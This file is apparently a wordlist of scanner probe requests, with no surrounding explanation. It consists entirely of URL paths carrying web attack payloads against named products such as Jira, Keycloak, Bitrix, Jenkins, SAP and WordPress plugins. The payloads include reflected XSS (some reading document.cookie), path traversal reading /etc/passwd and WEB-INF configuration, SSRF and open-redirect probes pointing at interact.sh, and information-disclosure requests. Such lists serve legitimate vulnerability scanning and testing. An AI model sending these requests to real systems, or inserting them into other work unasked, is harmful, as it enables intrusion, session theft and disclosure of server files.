/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/
/index.php?redirect=/\/interact.sh/
/index.php?redirect=//interact.sh
/%252f%255cinteract.sh%252fa%253fb/
/public/login.htm?type=probes
/public/login.htm?type=requests
/public/login.htm?type=treestat
/awcuser/cgi-bin/vcs_access_file.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd
/does_not_exist
/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E
/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href=
/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E
/OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain)
/kylin/api/admin/config
/secure/QueryComponent!Default.jspa
/secure/ViewUserHover.jspa
/auth/login?to=/92874%27;alert(document.domain)//280
/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E
/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E
/info.php?RESULT=\
/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/carbon/admin/login.jsp?msgId=%27%3Balert(%27document.domain%27)%2F%2F
/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/vtigercrm/libraries/
/vtigercrm/layouts/
/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
/install/index.php?step=database_config&db_error=<img%20src=x%20onerror=alert(document.domain)%20/>
/wp-admin/admin-post.php?page=give-settings&stripe_publishable_key={{stripe_publishable_key}}&stripe_publishable_key_test={{stripe_publishable_key_test}}&stripe_user_id={{stripe_user_id}}&stripe_access_token={{stripe_access_token}}&stripe_access_token_test={{stripe_access_token_test}}&connected=1
/gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample
/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample
/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://interact.sh/
/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh
/?url=http://interact.sh
/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh
/ajax/apps/manifests?action=all&format=debug&xss=<script>alert(document.domain);</script>
/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS
/assets/_core/php/profile.php
/assets/php/profile.php
/vendor/qcubed/qcubed/assets/php/profile.php
/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E
/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb
/sap/public/bc/icf/logoff?redirecturl=https://interact.sh
/help/english/index.html?javascript:alert(document.domain)
/auth/realms/master/clients-registrations/default/security-admin-console
/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E

/server-common/cgi-bin/login
/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME
/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}
/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}
/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}
/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E
/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E
/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true
/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
/backend/admin/common/clearcache?previousUrl=http://www.interact.sh
/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/_next/static/../server/pages-manifest.json
/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd
/proxy.stream?origin=http://{{interactsh-url}}
/external_content/retrieve/oembed?endpoint=http://{{interactsh-url}}&url=foo
?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1
/AdminTools/querybuilder/logonform.jsp
/javax.faces.resources/web.xml.jsf?loc=/../../WEB-INF
/javax.faces.resources/web.xml.jsf?con=/../../WEB-INF
/javax.faces.resources/faces-config.xml.jsf?loc=/../../WEB-INF
/javax.faces.resources/faces-config.xml.jsf?con=/../../WEB-INF
/?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E
/www/delivery/afr.php?refresh=10000&\
/pandora_console/attachment/pandora_chat.log.json.txt
/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22
/index.php?v=d&p=%22;alert(document.domain);%22
/plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS
/plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test
/plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/admingui/version/Version?productNameSrc=http://{{interactsh-url}}/test.jpg&productNameHeight=500&productNameWidth=500
/admingui/version/Masthead.jsp?productNameSrc=http://{{interactsh-url}}/test.jpg&productNameHeight=500&productNameWidth=500
/probe?target={{interactsh-url}}&module=http_2xx
